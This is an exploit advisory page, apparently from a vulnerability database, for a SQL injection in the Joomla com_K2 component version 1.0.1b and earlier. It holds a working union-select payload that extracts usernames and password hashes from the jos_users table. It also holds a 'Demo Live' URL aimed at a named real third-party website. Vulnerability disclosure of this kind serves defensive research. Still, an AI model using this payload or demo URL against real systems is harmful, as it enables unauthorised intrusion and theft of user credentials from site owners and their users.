Joomla Component com_K2 <= 1.0.1b (category) SQL Injection Vuln

2009-07-10 / 2009-07-11
Credit: Chip D3 Bi0s
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

---------------------------------------------------------------------- Joomla Component com_k2 (sectionid) SQL injection Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Group : LatinHackTeam [+] Vulnerability : SQL injection ################################################### Information from file: mod_k2.xml Name : K2 Module Author : JoomlaWorks CreationDate : April 6th, 2009 Copyright : Copyright (c) 2006-2009 JoomlaWorks Ltd. All rights reserved. AuthorEmail : contact@joomlaworks.gr AuthorUrl : www.joomlaworks.gr Version : 1.0.1 Beta License : http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL Dowloand : http://code.google.com/p/joomlaworks/downloads/detail?name=K2-1.0.1beta2_j15_UNZIP_FIRST.zip -------------------------------------------------------------------- Example: http://localHost/path//index.php?option=com_k2&view=itemlist&category=<sql Code> <Sql Code>: null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/* Demo Live (1): http://ajedrezmarketing.com/index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/* +++++++++++++++++++++++++++++++++ [!] Produced in South America ---------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top